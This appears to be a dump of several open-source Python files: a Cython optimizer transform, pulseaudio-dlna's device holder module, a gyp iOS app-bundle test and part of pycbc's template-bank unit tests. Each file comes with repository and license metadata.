return node
if isinstance(node.constant_result, float):
return node
operand1, operand2 = node.operand1, node.operand2
if not operand1.is_literal or not operand2.is_literal:
return node
# now inject a new constant node with the calculated value
try:
type1, type2 = operand1.type, operand2.type
if type1 is None or type2 is None:
return node
except AttributeError:
return node
if type1.is_numeric and type2.is_numeric:
widest_type = PyrexTypes.widest_numeric_type(type1, type2)
else:
widest_type = PyrexTypes.py_object_type
target_class = self._widest_node_class(operand1, operand2)
if target_class is None:
return node
elif target_class is ExprNodes.BoolNode and node.operator in '+-//<<%**>>':
# C arithmetic results in at least an int type
target_class = ExprNodes.IntNode
elif target_class is ExprNodes.CharNode and node.operator in '+-//<<%**>>&|^':
# C arithmetic results in at least an int type
target_class = ExprNodes.IntNode
if target_class is ExprNodes.IntNode:
unsigned = getattr(operand1, 'unsigned', '') and \
getattr(operand2, 'unsigned', '')
longness = "LL"[:max(len(getattr(operand1, 'longness', '')),
len(getattr(operand2, 'longness', '')))]
new_node = ExprNodes.IntNode(pos=node.pos,
unsigned=unsigned, longness=longness,
value=str(int(node.constant_result)),
constant_result=int(node.constant_result))
# IntNode is smart about the type it chooses, so we just
# make sure we were not smarter this time
if widest_type.is_pyobject or new_node.type.is_pyobject:
new_node.type = PyrexTypes.py_object_type
else:
new_node.type = PyrexTypes.widest_numeric_type(widest_type, new_node.type)
else:
if target_class is ExprNodes.BoolNode:
node_value = node.constant_result
else:
node_value = str(node.constant_result)
new_node = target_class(pos=node.pos, type = widest_type,
value = node_value,
constant_result = node.constant_result)
return new_node
def visit_MulNode(self, node):
self._calculate_const(node)
if node.operand1.is_sequence_constructor:
return self._calculate_constant_seq(node, node.operand1, node.operand2)
if isinstance(node.operand1, ExprNodes.IntNode) and \
node.operand2.is_sequence_constructor:
return self._calculate_constant_seq(node, node.operand2, node.operand1)
return self.visit_BinopNode(node)
def _calculate_constant_seq(self, node, sequence_node, factor):
if factor.constant_result != 1 and sequence_node.args:
if isinstance(factor.constant_result, (int, long)) and factor.constant_result <= 0:
del sequence_node.args[:]
sequence_node.mult_factor = None
elif sequence_node.mult_factor is not None:
if (isinstance(factor.constant_result, (int, long)) and
isinstance(sequence_node.mult_factor.constant_result, (int, long))):
value = sequence_node.mult_factor.constant_result * factor.constant_result
sequence_node.mult_factor = ExprNodes.IntNode(
sequence_node.mult_factor.pos,
value=str(value), constant_result=value)
else:
# don't know if we can combine the factors, so don't
return self.visit_BinopNode(node)
else:
sequence_node.mult_factor = factor
return sequence_node
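    # Illustrative note (added): [1, 2] * 0 collapses to an empty list
    # literal, while [1, 2] * 3 keeps its arguments and stores 3 as the
    # sequence's mult_factor for later expansion.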
def visit_PrimaryCmpNode(self, node):
# calculate constant partial results in the comparison cascade
self.visitchildren(node, ['operand1'])
left_node = node.operand1
cmp_node = node
while cmp_node is not None:
self.visitchildren(cmp_node, ['operand2'])
right_node = cmp_node.operand2
cmp_node.constant_result = not_a_constant
if left_node.has_constant_result() and right_node.has_constant_result():
try:
cmp_node.calculate_cascaded_constant_result(left_node.constant_result)
except (ValueError, TypeError, KeyError, IndexError, AttributeError, ArithmeticError):
pass # ignore all 'normal' errors here => no constant result
left_node = right_node
cmp_node = cmp_node.cascade
if not node.cascade:
if node.has_constant_result():
return self._bool_node(node, node.constant_result)
return node
# collect partial cascades: [[value, CmpNode...], [value, CmpNode, ...], ...]
cascades = [[node.operand1]]
final_false_result = []
def split_cascades(cmp_node):
if cmp_node.has_constant_result():
if not cmp_node.constant_result:
# False => short-circuit
final_false_result.append(self._bool_node(cmp_node, False))
return
else:
# True => discard and start new cascade
cascades.append([cmp_node.operand2])
else:
# not constant => append to current cascade
cascades[-1].append(cmp_node)
if cmp_node.cascade:
split_cascades(cmp_node.cascade)
split_cascades(node)
cmp_nodes = []
for cascade in cascades:
if len(cascade) < 2:
continue
cmp_node = cascade[1]
pcmp_node = ExprNodes.PrimaryCmpNode(
cmp_node.pos,
operand1=cascade[0],
operator=cmp_node.operator,
operand2=cmp_node.operand2,
constant_result=not_a_constant)
cmp_nodes.append(pcmp_node)
last_cmp_node = pcmp_node
for cmp_node in cascade[2:]:
last_cmp_node.cascade = cmp_node
last_cmp_node = cmp_node
last_cmp_node.cascade = None
if final_false_result:
# last cascade was constant False
cmp_nodes.append(final_false_result[0])
elif not cmp_nodes:
# only constants, but no False result
return self._bool_node(node, True)
node = cmp_nodes[0]
if len(cmp_nodes) == 1:
if node.has_constant_result():
return self._bool_node(node, node.constant_result)
else:
for cmp_node in cmp_nodes[1:]:
node = ExprNodes.BoolBinopNode(
node.pos,
operand1=node,
operator='and',
operand2=cmp_node,
constant_result=not_a_constant)
return node
def visit_CondExprNode(self, node):
self._calculate_const(node)
if not node.test.has_constant_result():
return node
if node.test.constant_result:
return node.true_val
else:
return node.false_val
def visit_IfStatNode(self, node):
self.visitchildren(node)
# eliminate dead code based on constant condition results
if_clauses = []
for if_clause in node.if_clauses:
condition = if_clause.condition
if condition.has_constant_result():
if condition.constant_result:
# always true => subsequent clauses can safely be dropped
node.else_clause = if_clause.body
break
# else: false => drop clause
else:
# unknown result => normal runtime evaluation
if_clauses.append(if_clause)
if if_clauses:
node.if_clauses = if_clauses
return node
elif node.else_clause:
return node.else_clause
else:
return Nodes.StatListNode(node.pos, stats=[])
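    # Example (added comment): clauses with a constant false condition are
    # dropped, the first constant true clause becomes the else branch and
    # discards everything after it, and an 'if' left with no clauses reduces
    # to its else clause or an empty statement list.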
def visit_SliceIndexNode(self, node):
self._calculate_const(node)
# normalise start/stop values
if node.start is None or node.start.constant_result is None:
start = node.start = None
else:
start = node.start.constant_result
if node.stop is None or node.stop.constant_result is None:
stop = node.stop = None
else:
stop = node.stop.constant_result
# cut down sliced constant sequences
if node.constant_result is not not_a_constant:
base = node.base
if base.is_sequence_constructor and base.mult_factor is None:
base.args = base.args[start:stop]
return base
elif base.is_string_literal:
base = base.as_sliced_node(start, stop)
if base is not None:
return base
return node
def visit_ComprehensionNode(self, node):
self.visitchildren(node)
if isinstance(node.loop, Nodes.StatListNode) and not node.loop.stats:
# loop was pruned already => transform into literal
if node.type is Builtin.list_type:
return ExprNodes.ListNode(
node.pos, args=[], constant_result=[])
elif node.type is Builtin.set_type:
return ExprNodes.SetNode(
node.pos, args=[], constant_result=set())
elif node.type is Builtin.dict_type:
return ExprNodes.DictNode(
node.pos, key_value_pairs=[], constant_result={})
return node
def visit_ForInStatNode(self, node):
self.visitchildren(node)
sequence = node.iterator.sequence
if isinstance(sequence, ExprNodes.SequenceNode):
if not sequence.args:
if node.else_clause:
return node.else_clause
else:
# don't break list comprehensions
return Nodes.StatListNode(node.pos, stats=[])
# iterating over a list literal? => tuples are more efficient
if isinstance(sequence, ExprNodes.ListNode):
node.iterator.sequence = sequence.as_tuple()
return node
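    # Illustrative note (added for clarity): 'for x in []:' reduces to the
    # loop's else clause (or an empty statement list), and a list literal
    # like [1, 2, 3] is iterated as the tuple (1, 2, 3) instead.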
def visit_WhileStatNode(self, node):
self.visitchildren(node)
if node.condition and node.condition.has_constant_result():
if node.condition.constant_result:
node.condition = None
node.else_clause = None
else:
return node.else_clause
return node
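    # Example (added): 'while True:' drops the condition and the else clause,
    # while 'while False:' is replaced by its else clause (or removed
    # entirely when there is none).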
def visit_ExprStatNode(self, node):
self.visitchildren(node)
if not isinstance(node.expr, ExprNodes.ExprNode):
# ParallelRangeTransform does this ...
return node
# drop unused constant expressions
if node.expr.has_constant_result():
return None
return node
# in the future, other nodes can have their own handler method here
# that can replace them with a constant result node
visit_Node = Visitor.VisitorTransform.recurse_to_children
class FinalOptimizePhase(Visitor.CythonTransform):
"""
This visitor handles several commuting optimizations, and is run
just before the C code generation phase.
The optimizations currently implemented in this class are:
- eliminate None assignment and refcounting for first assignment.
- isinstance -> typecheck for cdef types
- eliminate checks for None and/or types that became redundant after tree changes
"""
def visit_SingleAssignmentNode(self, node):
"""Avoid redundant initialisation of local variables before their
first assignment.
"""
self.visitchildren(node)
if node.first:
lhs = node.lhs
lhs.lhs_of_first_assignment = True
return node
def visit_SimpleCallNode(self, node):
"""Replace generic calls to isinstance(x, type) by a more efficient
type check.
"""
self.visitchildren(node)
if node.function.type.is_cfunction and isinstance(node.function, ExprNodes.NameNode):
if node.function.name == 'isinstance' and len(node.args) == 2:
type_arg = node.args[1]
if type_arg.type.is_builtin_type and type_arg.type.name == 'type':
cython_scope = self.context.cython_scope
node.function.entry = cython_scope.lookup('PyObject_TypeCheck')
node.function.type = node.function.entry.type
PyTypeObjectPtr = PyrexTypes.CPtrType(cython_scope.lookup('PyTypeObject').type)
node.args[1] = ExprNodes.CastNode(node.args[1], PyTypeObjectPtr)
return node
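    # Illustrative note (added comment): isinstance(obj, SomeType), where the
    # second argument is known to be a type object, is rewritten into a
    # PyObject_TypeCheck() call with that argument cast to PyTypeObject*.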
def visit_PyTypeTestNode(self, node):
"""Remove tests for alternatively allowed None values from
type tests when we know that the argument cannot be None
anyway.
"""
self.visitchildren(node)
if not node.notnone:
if not node.arg.may_be_none():
node.notnone = True
return node
def visit_NoneCheckNode(self, node):
"""Remove None checks from expressions that definitely do not
carry a None value.
"""
self.visitchildren(node)
if not node.arg.may_be_none():
return node.arg
return node
class ConsolidateOverflowCheck(Visitor.CythonTransform):
"""
This class facilitates the sharing of overflow checking among all nodes
of a nested arithmetic expression. For example, given the expression
    a*b + c, where a, b, and c are all possibly overflowing ints, the entire
sequence will be evaluated and the overflow bit checked only at the end.
"""
overflow_bit_node = None
def visit_Node(self, node):
if self.overflow_bit_node is not None:
saved = self.overflow_bit_node
self.overflow_bit_node = None
self.visitchildren(node)
self.overflow_bit_node = saved
else:
self.visitchildren(node)
return node
def visit_NumBinopNode(self, node):
if node.overflow_check and node.overflow_fold:
top_level_overflow = self.overflow_bit_node is None
if top_level_overflow:
self.overflow_bit_node = node
else:
node.overflow_bit_node = self.overflow_bit_node
node.overflow_check = False
self.visitchildren(node)
if top_level_overflow:
self.overflow_bit_node = None
else:
self.visitchildren(node)
return node
| bsd-3-clause |
Cygn/pulseaudio-dlna | pulseaudio_dlna/holder.py | 3 | 5029 | #!/usr/bin/python
# This file is part of pulseaudio-dlna.
# pulseaudio-dlna is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# pulseaudio-dlna is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with pulseaudio-dlna. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import logging
import threading
import requests
import traceback
import setproctitle
import signal
import time
logger = logging.getLogger('pulseaudio_dlna.holder')
class Holder(object):
def __init__(
self, plugins,
pulse_queue=None, device_filter=None, device_config=None,
proc_title=None):
self.plugins = plugins
self.device_filter = device_filter or None
self.device_config = device_config or {}
self.pulse_queue = pulse_queue
self.devices = {}
self.proc_title = proc_title
self.lock = threading.Lock()
self.__running = True
def initialize(self):
signal.signal(signal.SIGTERM, self.shutdown)
if self.proc_title:
setproctitle.setproctitle(self.proc_title)
def shutdown(self, *args):
if self.__running:
logger.info('Holder.shutdown()')
self.__running = False
def search(self, ttl=None, host=None):
self.initialize()
threads = []
for plugin in self.plugins:
thread = threading.Thread(
target=plugin.discover, args=[self],
kwargs={'ttl': ttl, 'host': host})
thread.daemon = True
threads.append(thread)
try:
for thread in threads:
thread.start()
while self.__running:
all_dead = True
time.sleep(0.1)
for thread in threads:
if thread.is_alive():
all_dead = False
break
if all_dead:
break
except:
traceback.print_exc()
logger.info('Holder.search()')
def lookup(self, locations):
self.initialize()
xmls = {}
for url in locations:
try:
response = requests.get(url, timeout=5)
logger.debug('Response from device ({url})\n{response}'.format(
url=url, response=response.text))
xmls[url] = response.content
except requests.exceptions.Timeout:
logger.warning(
                    'Could not connect to {url}. '
'Connection timeout.'.format(url=url))
except requests.exceptions.ConnectionError:
logger.warning(
                    'Could not connect to {url}. '
'Connection refused.'.format(url=url))
for plugin in self.plugins:
for url, xml in xmls.items():
device = plugin.lookup(url, xml)
self.add_device(device)
def add_device(self, device):
if not device:
return
try:
self.lock.acquire()
if device.udn not in self.devices:
if device.validate():
config = self.device_config.get(device.udn, None)
device.activate(config)
if not self.device_filter or \
device.name in self.device_filter:
if config:
logger.info(
'Using device configuration:\n{}'.format(
device.__str__(True)))
self.devices[device.udn] = device
self._send_message('add_device', device)
else:
logger.info('Skipped the device "{name}" ...'.format(
name=device.label))
else:
if device.validate():
self._send_message('update_device', device)
finally:
self.lock.release()
def remove_device(self, device_id):
if not device_id or device_id not in self.devices:
return
try:
self.lock.acquire()
device = self.devices[device_id]
self._send_message('remove_device', device)
del self.devices[device_id]
finally:
self.lock.release()
def _send_message(self, _type, device):
if self.pulse_queue:
self.pulse_queue.put({
'type': _type,
'device': device
})
| gpl-3.0 |
mouhb/cjdns | node_build/dependencies/libuv/build/gyp/test/ios/gyptest-app-ios.py | 61 | 2237 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that ios app bundles are built correctly.
"""
import TestGyp
import subprocess
import sys
def CheckFileXMLPropertyList(file):
output = subprocess.check_output(['file', file])
# The double space after XML is intentional.
  if not 'XML  document text' in output:
print 'File: Expected XML document text, got %s' % output
test.fail_test()
def CheckFileBinaryPropertyList(file):
output = subprocess.check_output(['file', file])
if not 'Apple binary property list' in output:
print 'File: Expected Apple binary property list, got %s' % output
test.fail_test()
if sys.platform == 'darwin':
test = TestGyp.TestGyp(formats=['xcode', 'ninja'])
test.run_gyp('test.gyp', chdir='app-bundle')
test.build('test.gyp', test.ALL, chdir='app-bundle')
  # Test that the .app bundle and its executable were built
test.built_file_must_exist('Test App Gyp.app/Test App Gyp',
chdir='app-bundle')
# Info.plist
info_plist = test.built_file_path('Test App Gyp.app/Info.plist',
chdir='app-bundle')
test.built_file_must_exist(info_plist)
CheckFileBinaryPropertyList(info_plist)
# XML Info.plist
info_plist = test.built_file_path('Test App Gyp XML.app/Info.plist',
chdir='app-bundle')
CheckFileXMLPropertyList(info_plist)
# Resources
strings_file = test.built_file_path(
'Test App Gyp.app/English.lproj/InfoPlist.strings',
chdir='app-bundle')
test.built_file_must_exist(strings_file)
CheckFileBinaryPropertyList(strings_file)
test.built_file_must_exist(
'Test App Gyp.app/English.lproj/MainMenu.nib',
chdir='app-bundle')
test.built_file_must_exist(
'Test App Gyp.app/English.lproj/Main_iPhone.storyboardc',
chdir='app-bundle')
# Packaging
test.built_file_must_exist('Test App Gyp.app/PkgInfo',
chdir='app-bundle')
test.built_file_must_match('Test App Gyp.app/PkgInfo', 'APPLause',
chdir='app-bundle')
test.pass_test()
| gpl-3.0 |
ahnitz/pycbc | test/test_tmpltbank.py | 9 | 25760 | # Copyright (C) 2013 Ian Harry
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# =============================================================================
#
# Preamble
#
# =============================================================================
#
"""
These are the unittests for the pycbc.tmpltbank module
"""
from __future__ import division
import os
import numpy
import pycbc.tmpltbank
import pycbc.psd
import pycbc.pnutils
from pycbc import pnutils
from pycbc.types import Array
from pycbc.filter import match
from pycbc.waveform import get_fd_waveform
from six.moves import range
import difflib
import sys
import matplotlib
matplotlib.use('Agg')
import pylab
import unittest
from utils import parse_args_cpu_only, simple_exit
# This will return whatever is appropriate, depending on whether this
# particular instance of the unittest was called for CPU, CUDA, or OpenCL
parse_args_cpu_only("Template bank module")
import argparse
parser = argparse.ArgumentParser()
def update_mass_parameters(tmpltbank_class):
"""
Choose various sets of mass parameters for testing.
"""
num_comp_masses = 3
min_mass1 = [1,2,6]
max_mass1 = [5,8,12]
min_mass2 = [1,1,1]
max_mass2 = [5,5,5]
num_tot_masses = 3
# These *must* be provided
min_tot_mass = [None, 2.5, 3.5]
max_tot_mass = [None, 11, 7.5]
num_chirp_masses = 3
max_chirp_mass = [None, 2.43, 3.5]
min_chirp_mass = [None, 1.218, 2.43]
num_etas = 3
max_eta = [0.25, 0.24, 0.23]
min_eta = [None, 0.16, 0.17]
max_iter_idx = num_comp_masses * num_tot_masses *\
num_chirp_masses * num_etas
for idx in range(max_iter_idx):
comp_masses_idx = idx % num_comp_masses
tmpltbank_class.min_mass1 = min_mass1[comp_masses_idx]
tmpltbank_class.max_mass1 = max_mass1[comp_masses_idx]
tmpltbank_class.min_mass2 = min_mass2[comp_masses_idx]
tmpltbank_class.max_mass2 = max_mass2[comp_masses_idx]
reduced_idx = idx // num_comp_masses
tot_mass_idx = reduced_idx % num_tot_masses
tmpltbank_class.min_total_mass = min_tot_mass[tot_mass_idx]
tmpltbank_class.max_total_mass = max_tot_mass[tot_mass_idx]
reduced_idx = reduced_idx // num_tot_masses
chirp_mass_idx = reduced_idx % num_chirp_masses
tmpltbank_class.min_chirp_mass = min_chirp_mass[chirp_mass_idx]
tmpltbank_class.max_chirp_mass = max_chirp_mass[chirp_mass_idx]
reduced_idx = reduced_idx // num_chirp_masses
eta_idx = reduced_idx
tmpltbank_class.max_eta = max_eta[eta_idx]
tmpltbank_class.min_eta = min_eta[eta_idx]
yield idx
return
class TmpltbankTestClass(unittest.TestCase):
def setUp(self):
# Where are my data files?
if os.path.isfile('test/data/ZERO_DET_high_P.txt'):
self.dataDir = 'test/data/'
elif os.path.isfile('data/ZERO_DET_high_P.txt'):
self.dataDir = 'data/'
else:
self.assertTrue(False, msg="Cannot find data files!")
self.deltaF = 0.1
self.f_low = 15
self.f_upper = 2000
self.f0 = 70
self.sampleRate = 4096
self.pnOrder = 'threePointFivePN'
self.min_mass1 = 1
self.min_mass2 = 1
self.max_mass1 = 5
self.max_mass2 = 5
self.max_ns_spin_mag = 0.5
self.max_bh_spin_mag = 0.9
self.ns_bh_boundary_mass = 2.0
self.min_total_mass = 2.5
self.max_total_mass = 6.0
self.max_chirp_mass = 2.4375415772291475
self.min_chirp_mass = 1.2187707886145738
self.max_eta = 0.24
self.min_eta = 0.16
# Sanity check these
pycbc.tmpltbank.verify_mass_range_options(self, parser=parser)
# Need to use F2 metric for ethinca
self.ethincaOrder = 'threePointFivePN'
self.ethincaCutoff = 'SchwarzISCO'
self.ethincaFreqStep = 10.
self.segLen = 1./self.deltaF
self.psdSize = int(self.segLen * self.sampleRate / 2.) + 1
self.psd = pycbc.psd.from_txt('%sZERO_DET_high_P.txt' %(self.dataDir),\
self.psdSize, self.deltaF, self.f_low, is_asd_file=True)
match_psd_size = int(256 * self.sampleRate / 2.) + 1
self.psd_for_match = pycbc.psd.from_txt\
('%sZERO_DET_high_P.txt' %(self.dataDir), match_psd_size,
1./256., self.f_low, is_asd_file=True)
metricParams = pycbc.tmpltbank.metricParameters(self.pnOrder,\
self.f_low, self.f_upper, self.deltaF, self.f0)
metricParams.psd = self.psd
massRangeParams = pycbc.tmpltbank.massRangeParameters(self.min_mass1,\
self.max_mass1, self.min_mass2, self.max_mass2,\
maxNSSpinMag=self.max_ns_spin_mag,\
maxBHSpinMag=self.max_bh_spin_mag,\
maxTotMass=self.max_total_mass,\
minTotMass=self.min_total_mass,\
max_chirp_mass=self.max_chirp_mass,\
min_chirp_mass=self.min_chirp_mass,\
maxEta=self.max_eta,\
minEta=self.min_eta,\
ns_bh_boundary_mass=self.ns_bh_boundary_mass)
# And again with the nsbh flag
massRangeParams2 = pycbc.tmpltbank.massRangeParameters(self.min_mass1,\
self.max_mass1, self.min_mass2, self.max_mass2,\
maxNSSpinMag=self.max_ns_spin_mag,\
maxBHSpinMag=self.max_bh_spin_mag,\
maxTotMass=self.max_total_mass,\
minTotMass=self.min_total_mass,\
max_chirp_mass=self.max_chirp_mass,\
min_chirp_mass=self.min_chirp_mass,\
maxEta=self.max_eta,\
minEta=self.min_eta,\
nsbhFlag=True)
metricParams = pycbc.tmpltbank.determine_eigen_directions(metricParams)
vals=pycbc.tmpltbank.estimate_mass_range(100000, massRangeParams,\
metricParams, self.f_upper, covary=False)
cov = numpy.cov(vals)
_,self.evecsCV = numpy.linalg.eig(cov)
metricParams.evecsCV = {}
metricParams.evecsCV[self.f_upper] = self.evecsCV
vals=pycbc.tmpltbank.estimate_mass_range(100000, massRangeParams,\
metricParams, self.f_upper, covary=False)
self.metricParams = metricParams
self.massRangeParams = massRangeParams
self.massRangeParams2 = massRangeParams2
self.ethincaParams = pycbc.tmpltbank.ethincaParameters(
self.ethincaOrder, self.ethincaCutoff, self.ethincaFreqStep,
full_ethinca=False, time_ethinca=False)
self.xis = vals
def test_eigen_directions(self):
evalsStock = Array(numpy.loadtxt('%sstockEvals.dat'%(self.dataDir)))
evecsStock = Array(numpy.loadtxt('%sstockEvecs.dat'%(self.dataDir)))
maxEval = max(evalsStock)
evalsCurr = Array(self.metricParams.evals[self.f_upper])
evecsCurr = Array(self.metricParams.evecs[self.f_upper])
numpy.savetxt('newEvals.dat', evalsCurr)
numpy.savetxt('newEvecs.dat', evecsCurr)
errMsg = "pycbc.tmpltbank.determine_eigen_directions has failed "
errMsg += "sanity check."
evalsDiff = abs(evalsCurr - evalsStock)/maxEval
self.assertTrue(not (evalsDiff > 1E-5).any(), msg=errMsg)
for stock,test in zip(evecsStock.data,evecsCurr.data):
stockScaled = stock * evalsCurr.data**0.5
testScaled = test * evalsCurr.data**0.5
diff = stockScaled - testScaled
self.assertTrue(not (diff > 1E-4).any(), msg=errMsg)
def test_get_random_mass(self):
# Want to do this for a variety of mass combinations
for i in update_mass_parameters(self):
curr_min_mass = self.min_total_mass
curr_max_mass = self.max_total_mass
try:
pycbc.tmpltbank.verify_mass_range_options(self, parser=parser)
except ValueError:
# Some of the inputs are unphysical and will fail.
# These cases are known to fail, the inputs are unphysical
# 35 has inconsistent total mass and eta restrictions
# 38 Component mass, [upper] chirp mass and [lower] eta limits
# rule out the entire space.
# 41 Same as 38
# 44 Same as 38
# 62 From component mass and total mass limits only total masses
# between 7 and 7.5 are possible. This range all has eta
# lower than the limit of 0.17.
# 65 Same as 38
# 68 Same as 38
# 71 Same as 38
# 80 Same as 62
if i in [35,38,41,44,62,65,68,71,80]:
continue
raise
# Check that if the mass limits have changed, it was right to do so
# This is not exhaustive, but gets most things
if not self.min_total_mass == curr_min_mass:
min_comp_mass = self.min_mass1 + self.min_mass2
min_eta = self.min_mass1 * self.min_mass2 /\
(min_comp_mass * min_comp_mass)
min_chirp_mass = min_comp_mass * min_eta**(3./5.)
if self.min_total_mass == min_comp_mass:
# Okay, the total mass is changed by the components
pass
elif (self.min_eta and min_eta < self.min_eta) or \
(self.max_eta and min_eta > self.max_eta):
# Okay, not possible from eta
pass
elif min_chirp_mass < self.min_chirp_mass:
# Okay, not possible from chirp mass
pass
else:
err_msg = "Minimum total mass changed unexpectedly."
print(self.min_total_mass, curr_min_mass)
print(self.min_mass1, self.min_mass2, min_comp_mass)
print(min_eta, self.min_eta, self.max_eta)
print(min_chirp_mass, self.min_chirp_mass)
self.fail(err_msg)
if not self.max_total_mass == curr_max_mass:
max_comp_mass = self.max_mass1 + self.max_mass2
max_eta = self.max_mass1 * self.max_mass2 /\
(max_comp_mass * max_comp_mass)
max_chirp_mass = max_comp_mass * max_eta**(3./5.)
if self.max_total_mass == max_comp_mass:
# Okay, the total mass is changed by the components
pass
elif (self.min_eta and max_eta < self.min_eta) or\
(self.max_eta and max_eta > self.max_eta):
# Okay, not possible from eta
pass
elif max_chirp_mass > self.max_chirp_mass:
# Okay, not possible from chirp mass
pass
else:
err_msg = "Maximum total mass changed unexpectedly."
self.fail(err_msg)
massRangeParams = pycbc.tmpltbank.massRangeParameters(\
self.min_mass1,\
self.max_mass1, self.min_mass2, self.max_mass2,\
maxNSSpinMag=self.max_ns_spin_mag,\
maxBHSpinMag=self.max_bh_spin_mag,\
maxTotMass=self.max_total_mass,\
minTotMass=self.min_total_mass,\
max_chirp_mass=self.max_chirp_mass,\
min_chirp_mass=self.min_chirp_mass,\
maxEta=self.max_eta,\
minEta=self.min_eta,\
ns_bh_boundary_mass=self.ns_bh_boundary_mass)
# And again with the nsbh flag
massRangeParams2 = pycbc.tmpltbank.massRangeParameters(\
self.min_mass1,\
self.max_mass1, self.min_mass2, self.max_mass2,\
maxNSSpinMag=self.max_ns_spin_mag,\
maxBHSpinMag=self.max_bh_spin_mag,\
maxTotMass=self.max_total_mass,\
minTotMass=self.min_total_mass,\
max_chirp_mass=self.max_chirp_mass,\
min_chirp_mass=self.min_chirp_mass,\
maxEta=self.max_eta,\
minEta=self.min_eta,\
nsbhFlag=True)
mass1, mass2, spin1z, spin2z = \
pycbc.tmpltbank.get_random_mass(100000, massRangeParams)
mass = mass1 + mass2
errMsg = "pycbc.tmpltbank.get_random_mass returns invalid ranges."
self.assertTrue(not (mass < self.min_total_mass).any(),msg=errMsg)
self.assertTrue(not (mass > self.max_total_mass).any(),msg=errMsg)
self.assertTrue(not (mass1 > self.max_mass1 * 1.001).any(),
msg=errMsg)
self.assertTrue(not (mass1 < self.min_mass1 * 0.999).any(),
msg=errMsg)
self.assertTrue(not (mass2 > self.max_mass2 * 1.001).any(),
msg=errMsg)
self.assertTrue(not (mass2 < self.min_mass2 * 0.999).any(),
msg=errMsg)
self.assertTrue(not (mass1 < mass2).any(),msg=errMsg)
# Chirp mass and eta
mchirp, eta = pnutils.mass1_mass2_to_mchirp_eta(mass1,mass2)
if self.max_chirp_mass:
self.assertTrue(not (mchirp > self.max_chirp_mass*1.0001).any(),
msg=errMsg)
if self.min_chirp_mass:
self.assertTrue(not (mchirp < self.min_chirp_mass*0.9999).any(),
msg=errMsg)
if self.min_eta:
self.assertTrue(not (eta < self.min_eta*0.9999).any(),
msg=errMsg)
self.assertTrue(not (eta > self.max_eta*1.0001).any(),
msg=errMsg)
nsSpin1 = spin1z[mass1 < self.ns_bh_boundary_mass]
nsSpin2 = spin2z[mass2 < self.ns_bh_boundary_mass]
bhSpin1 = spin1z[mass1 > self.ns_bh_boundary_mass]
bhSpin2 = spin2z[mass2 > self.ns_bh_boundary_mass]
self.assertTrue(not (abs(nsSpin1) > 0.5).any(), msg=errMsg)
self.assertTrue(not (abs(nsSpin2) > 0.5).any(), msg=errMsg)
self.assertTrue(not (abs(bhSpin1) > 0.9).any(), msg=errMsg)
self.assertTrue(not (abs(bhSpin2) > 0.9).any(), msg=errMsg)
# Check that *some* spins are bigger than 0.5
if len(bhSpin1):
self.assertTrue((abs(bhSpin1) > 0.5).any(), msg=errMsg)
if len(bhSpin2):
self.assertTrue((abs(bhSpin2) > 0.5).any(), msg=errMsg)
# Check nsbh flag
mass1, mass2, spin1z, spin2z = \
pycbc.tmpltbank.get_random_mass(100000, massRangeParams2)
self.assertTrue(not (abs(spin1z) > 0.9).any(), msg=errMsg)
self.assertTrue(not (abs(spin2z) > 0.5).any(), msg=errMsg)
self.assertTrue((abs(spin1z) > 0.5).any(), msg=errMsg)
def test_metric_match_prediction(self):
mass1a, mass2a, spin1za, spin2za = \
pycbc.tmpltbank.get_random_mass(10, self.massRangeParams)
mass1b, mass2b, spin1zb, spin2zb = \
pycbc.tmpltbank.get_random_mass(10, self.massRangeParams)
for idx in range(10):
masses1 = [mass1a[idx], mass2a[idx], spin1za[idx], spin2za[idx]]
masses2 = [mass1b[idx], mass2b[idx], spin1zb[idx], spin2zb[idx]]
dist, _, _ = pycbc.tmpltbank.get_point_distance \
(masses1, masses2, self.metricParams, self.f_upper)
opt_dist = 0.02
while dist > opt_dist * 1.01 or dist < opt_dist * 0.99:
dist_fac = opt_dist / dist
dist_fac = dist_fac**0.5
if dist_fac < 0.01:
dist_fac = 0.01
if dist_fac > 2:
dist_fac = 2
for idx, curr_mass2 in enumerate(masses2):
masses2[idx] = masses1[idx] + \
(curr_mass2 - masses1[idx]) * dist_fac
dist, _, _ = pycbc.tmpltbank.get_point_distance \
(masses1, masses2, self.metricParams, self.f_upper)
self.assertFalse(numpy.isnan(dist))
htilde1, _ = get_fd_waveform\
(approximant='TaylorF2', mass1=masses1[0], mass2=masses1[1],
spin1z=masses1[2], spin2z=masses1[3], delta_f=1.0/256,
f_lower=15, f_final=2000)
htilde2, _ = get_fd_waveform\
(approximant='TaylorF2', mass1=masses2[0], mass2=masses2[1],
spin1z=masses2[2], spin2z=masses2[3], delta_f=1.0/256,
f_lower=15, f_final=2000)
overlap, _ = match(htilde1, htilde2, psd=self.psd_for_match,
low_frequency_cutoff=15)
self.assertTrue(overlap > 0.97 and overlap < 0.985)
def test_chirp_params(self):
chirps=pycbc.tmpltbank.get_chirp_params(2.2, 1.8, 0.2, 0.3,
self.metricParams.f0, self.metricParams.pnOrder)
stockChirps = numpy.loadtxt('%sstockChirps.dat'%(self.dataDir))
diff = (chirps - stockChirps) / stockChirps
errMsg = "Calculated chirp params differ from that expected."
self.assertTrue( not (abs(diff) > 1E-4).any(), msg=errMsg)
def test_hexagonal_placement(self):
arrz = pycbc.tmpltbank.generate_hexagonal_lattice(10, 0, 10, 0, 0.03)
arrz = numpy.array(arrz)
stockGrid = numpy.loadtxt("%sstockHexagonal.dat"%(self.dataDir))
diff = arrz - stockGrid
errMsg = "Calculated lattice differs from that expected."
self.assertTrue( not (diff > 1E-4).any(), msg=errMsg)
def test_anstar_placement(self):
